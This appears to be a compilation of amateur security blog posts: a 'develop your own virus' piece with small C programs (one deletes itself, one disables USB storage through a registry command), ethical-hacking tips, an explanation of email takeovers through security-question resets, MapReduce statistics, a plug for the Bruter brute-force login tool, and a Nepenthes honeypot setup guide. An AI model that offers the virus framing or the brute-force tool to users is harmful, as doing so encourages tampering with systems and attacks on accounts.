Developing your own VIRUS (Vital Information Resource Under Seize)

Virus is an application which runs as a system process and makes the OS behave abnormally from its normal behavior.
Virus can be coded in any programming language, Batch, Shell ,Vb Script, J script, C, C++, Perl, Delphi, Python,Haskel etc.
We will see a simple Self Destructing Virus in "C"

#include<"stdio.h">
#include<"conio.h">
#include<"dos.h">
void main()
{
printf(“This program will destroy itself if u press any key!!!\n”);
getch();
remove(_argv[0]);/*array of pointers to command line arguments*/
}

Generate an EXE from the above program. Execution of the above program removes the EXE File.

Disabling USB Ports using a simple program

#include<"stdio.h">

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

Understanding perfectly every function of an OS and a basic skill of executing System functions from a programming language, Every one can code their own Virus!!!!

5 Steps for Improving Skills in Network Security (Ethical hacking)

With the increase in cyber threats , many of us have interest to learn more about Hacking .. This is the most common term that is googled by most people.

Steps I suggest to improve the expertise in Ethical Hacking or Network Security :)
1) Strong Fundamentals of an Operating System like how an OS Boots, how everything works, how .exe works, .dll works, how a drive autoruns etc.
2)Detailed Understanding of Network Protocols , TCP, ICMP, FTP,HTTP,TELNET,NETBIOS etc because all these ports in one or the other way to distract a system from its routine use.
3)Reverse Engineer or dissecting an EXE File , for this you should have knowledge of ASSEMBLY Language.
4)Understanding of Programming Languages , to understand a system language or web application language. Even if you dont know the language should be in a situation to understand the program, dont think its funny without knowing the language how can you understand. Whatever be the programming language they have basic functions common like datatypes, IO, Cryptographic functions. You can apply the functions of language to the other
5) How a webapplication works, PHP is recommended since its open source, it is used as the main source for malware distribution and infection.

Follow the above steps and work with dedication everyone will be a good security analyst :) :)

Hacking Google, Yahoo , Live etc ? Is it possible?

Now and then, we will be listening through friends or neighbors that my Gmail account or yahoo account has been hacked. The term "hack" is used very frequently. Let me try to define hacking, Hacking is the art of exploiting webservers, mailservers etc, without the victim knowing that there has been data theft in there servers.

Gmail, a service provided by google, Yahoo mail, a service provided by Yahoo! spends billion dollars on there security. They consider the security of there services as the primary aspect, If its true that the gmail or ymail can be hacked so easily, they why would people go for such services???
Its all the misconcept that has been growing the people that gmail or ymail hacking is easy. The people are believing rumors.

My intention in writing this article is to create an awareness in the people believing that Gmail or Ymail has been hacked.

I want to discuss one of the technique used by some people trying to get the password of yahoo mail.
VICTIM: person whose password is being reset(misinterpreted as hacked)
MALPERSON: person who is trying to reset the VICTIMS password
MALPERSON will be the person who knows the details of the VICTIM, like Date of Birth,PinCode,Country or Security Questions, Knowing these password can be reset easily.
MALPERSON, opens the yahoo mail, click the ForgotPassword option, enters the Yahoo! ID and enters the Security Questions correctly and changes the passwords, secondary email etc.
People misinterpret this as hacking. Its a trick played by most of the people

Gmail sends Password Recovery option to the Secondary email, Most of the persons use there yahoo email as the secondary email address, People take this as the advantage and reset both the passwords.

Note : If your email password has been reset, it will be by the person whom you knowing mostly,(Chances are high). Person knowing the victim fully can only answer his questions perfectly.

Is it possible to know that some other person has entered our email or not???
Yes, its possible to know if any person has logged into our email address, you need to check the IP address log, if you are aware of the Public of the system you used for logging to your mail account lastly.

So Friends, please be dont be in misconcept that Gmail or Yahoo can be hacked.

Simplified Data Processing of PetaBytes of Data Used By Google

Google currently processes over 20 petabytes of data per day through an average of 100,000 MapReduce jobs spread across its massive computing clusters. The average MapReduce job ran across approximately 400 machines in September 2007, crunching approximately 11,000 machine years in a single month. These are just some of the facts about the search giant's computational processing infrastructure revealed in an ACM paper by Google Fellows Jeffrey Dean and Sanjay Ghemawat.

Twenty petabytes (20,000 terabytes) per day is a tremendous amount of data processing and a key contributor to Google's continued market dominance. Competing search storage and processing systems at Microsoft (Dyrad) and Yahoo! (Hadoop) are still playing catch-up to Google's suite of GFS, MapReduce, and BigTable.

MapReduce statistics for different months

	Aug. 2004	Mar. 2006	Sep. 2007
Number of jobs (1000s)	29	171	2,217
Avg. completion time (secs)	634	874	395
Machine years used	217	2,002	11,081
map input data (TB)	3,288	52,254	403,152
map output data (TB)	758	6,743	34,774
reduce output data (TB)	193	2,970	14,018
Avg. machines per job	157	268	394
Unique implementations
map	395	1,958	4,083
reduce	269	1,208	2,418

Google processes its data on a standard machine cluster node consisting two 2 GHz Intel Xeon processors with Hyper-Threading enabled, 4 GB of memory, two 160 GB IDE hard drives and a gigabit Ethernet link. This type of machine costs approximately $2400 each through providers such as Penguin Computing or Dell or approximately $900 a month through a managed hosting provider such as Verio (for startup comparisons).

The average MapReduce job runs across a $1 million hardware cluster, not including bandwidth fees, datacenter costs, or staffin

Here is the Presentation of Jeffry and Sanjay.

Parallel Network Brute Force ****** BRUTER******

Here, I want to introduce every one who are aware of aware of bruteforcing. a New tool to increase the speed of bruteforcing using Network and that is BRUTER

Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.

It currently supports following services:

• FTP
• HTTP (Basic)
• HTTP (Form)
• IMAP
• MSSQL
• MySQL
• POP3
• SMB-NT
• SMTP
• SNMP
• SSH2
• Telnet
• VNC

I am not posting the link...... Google it , Download it and Test it :)

Creating a Honey pot using Nepenthes

Get a copy of Debian and install it.

Download Nepenthes http://nepenthes.carnivore.it/download

Once the base install of Debian has finished, it would be a good idea to set a static IP address on the main network adaptor (eth0 in my case); to do this open up /etc/network/interfaces with nano:

# nano /etc/networking/interfaces

Change the line:

iface eth0 inet dhcp

To:

iface eth0 inet static

Add the static IP information underneath that line:

address 192.168.0.240

netmask 255.255.255.0

network 192.168.0.0

broadcast 192.168.0.255

gateway 192.168.0.1

Obviously you may want to adjust these to suit your own network; it’s worth double checking /etc/resolv.conf to see that the correct DNS server is in place. Make the changes live with:

# /etc/init.d/networking restart

# ifup eth0

Now make sure the system is up to date:

# apt-get update

# apt-get upgrade

Remove the exim4 MTU as this will stop the honeypot from listening on port 25:

# apt-get remove exim4

And install Nepenthes with its associated dependencies:

# apt-get install nepenthes

Once Nepenthes is installed there is actually very little configuration to be done to get things up and running. First of all, open up /etc/nepenthes/nepenthes.conf and see that the following lines are not commented out:

    "submitfile.so"    "submit-file.conf"

    "submitnorman.so"    "submit-norman.conf"

    "logdownload.so"    "log-download.conf"

Also change replace_local_ips to 0.

Now check the configuration files above-they are all found in the /etc/nepenthes directory.

Inside submit-file.conf, you will find the path to a directory in your filesystem. This is where downloaded malware will be stored.

Norman sandbox is an automated malware analyser. Enter a valid e-mail address in submit-norman.conf; malware captured by your honeypot will be submitted to the Norman analyser and reports on the analysis will be sent to this address.

The file log-download.conf specifies the location of log files that will list downloaded malware and malware submissions.

Now restart Nepenthes with the updated configuration (the installation may have started it with the default config:

# /etc/init.d/nepenthes restart

The last step very much depends on the router/firewall in use. In my case, I’m using a Netgear ADSL router; this allows me to set a DMZ destination. The router then passes all incoming traffic to this address if there is no other rule defined for that particular port. If your router does not have a DMZ feature, you can manually redirect incoming connections on interesting ports to the Nepenthes collector.

Found it quite alarming how quickly Nepenthes has started to collect information about attempted break-ins and automated malware downloads! It’s very interesting to see the large number of entries for ‘Unknown DCOM Shellcode’.